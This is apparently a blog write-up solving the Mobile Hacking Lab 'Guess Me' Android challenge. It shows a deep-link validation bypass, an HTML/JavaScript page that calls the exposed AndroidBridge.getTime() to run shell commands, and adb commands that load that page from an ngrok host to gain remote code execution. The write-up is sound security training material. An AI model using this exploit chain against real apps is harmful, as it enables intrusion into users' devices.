# Guess me

1. Hello everyone. In this blog post I will walk through my solution to the Guess Me challenge from the Mobile Hacking Lab platform (package `com.mobilehackinglab.guessme`). I hope it is useful for you.
2. Let's install the app and open it. It is a number-guessing game: the app picks a random number and you win when you enter the right guess.

   <img src="/files/t4DjJOCnDWT8CfnsTbkw" alt="image.png" width="266">
3. While analysing the AndroidManifest.xml file we found two important activities: `MainActivity` and `WebviewActivity`, which handles the `mhl` scheme.

   <figure><img src="/files/Uthd9Ls94uob6Mm19lJb" alt="" width="563"><figcaption></figcaption></figure>
4. Let's analyse the first one (`MainActivity`). I found these important methods:
   1. `startNewGame()`: first generates a random number (the secret number), then resets the attempt counter to 0, displays an initial message, and enables user input.

      <figure><img src="/files/v0Ds5d1wGS2vG27kv5Ph" alt=""><figcaption></figcaption></figure>
   2. `validateGuess()`: retrieves the user input and compares it with the secret number to tell the user whether the guess is too high or too low; if the guess is correct it displays a congratulations message, otherwise a failure message.

      <figure><img src="/files/AQRCis5IslSGqVYh4jwi" alt=""><figcaption></figcaption></figure>
   3. `enableInput()` / `disableInput()`: toggle whether the user can enter text.
5. Let's analyse the second one (`WebviewActivity`). I found these important methods:
   1. `onCreate()`: enables JavaScript in the WebView and adds a JavaScript interface so that JS code can call into the app; `AndroidBridge` is the object name the WebView will use to reach it.

      <figure><img src="/files/Gx3qDBr9cfD1abN1IkyQ" alt=""><figcaption></figcaption></figure>
   2. `isValidDeepLink()`: accepts URLs whose scheme is `mhl` or `https` and whose host is `mobilehackinglab`. It also checks that the `url` query parameter ends with `"mobilehackinglab.com"`. This is a suffix check on the whole string, not a check on the host of the `url` value, so any URL whose path or query string ends in `mobilehackinglab.com` passes.

      <figure><img src="/files/iAgEmPAQt4qIkLTJp3fQ" alt=""><figcaption></figcaption></figure>
   3. `MyJavaScriptInterface` class:
      1. `loadWebsite()`: takes a URL, checks that it is not null, then loads it inside the WebView.
      2. `getTime()`: takes a string and executes it as a system command via `Runtime.getRuntime().exec(Time);`, then reads the process output through a stream and returns it as text. Because the argument is caller-controlled and the method is exposed to JavaScript through `AndroidBridge`, any page loaded in the WebView can run arbitrary commands.

         <figure><img src="/files/0sCjr9DQ2WsnD5n9H9e9" alt=""><figcaption></figcaption></figure>
6. Let's test it with adb. The `url` value below ends with `mobilehackinglab.com` only because of its path, so the check passes and the WebView loads Google: `adb shell am start -n com.mobilehackinglab.guessme/.WebviewActivity -d "mhl://mobilehackinglab?url=https://google.com/mobilehackinglab.com"`

   <figure><img src="/files/fXlmFrLsor00qas5H8WO" alt=""><figcaption></figcaption></figure>
7. Then we can call the methods of `MyJavaScriptInterface` from a page we control: write JavaScript that calls `getTime()` with a command as its argument, host the page on a public server, and load it through the deep link to achieve RCE.

   ```html
   <!DOCTYPE html>
   <html lang="en">
   <head>
       <meta charset="UTF-8">
       <meta name="viewport" content="width=device-width, initial-scale=1.0">
   </head>
   <body>

   <p id="result">Thank you for visiting</p>

   <!-- Add a hyperlink with onclick event -->
   <a href="#" onclick="executeCommand()">Execute Command</a>

   <script>

       function executeCommand() {
           try {
               // AndroidBridge is the object name registered via addJavascriptInterface;
               // getTime() passes its argument straight to Runtime.exec()
               var result = AndroidBridge.getTime("whoami");
               // the command output is returned as text; take its first line
               var lines = result.split('\n');
               var timeVisited = lines[0];
               var fullMessage = "Command: " + timeVisited;
               document.getElementById('result').innerText = fullMessage;

               // then navigate to the legitimate site so the page looks harmless
               window.location.href = "https://www.mobilehackinglab.com/";
           } catch (e) {
               console.error("Error calling getTime:", e);
           }
       }

   </script>

   </body>
   </html>
   ```
8. Host the page on a public server (ngrok is used here):

   <figure><img src="/files/6FqjHXGP2XK8NkHg8rNw" alt=""><figcaption></figcaption></figure>

9. Let's trigger the exploit with adb. The `?mobilehackinglab.com` appended to the exploit URL is just a query string, but it makes the `url` value end with `mobilehackinglab.com`, so `isValidDeepLink()` accepts it: `adb shell am start -W -a android.intent.action.VIEW -d "mhl://mobilehackinglab/?url=https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com"`

   <figure><img src="/files/nFnaeBDvYeBsmjz5WpBr" alt=""><figcaption></figcaption></figure>
10. And here we have executed the `whoami` command, so we have RCE.

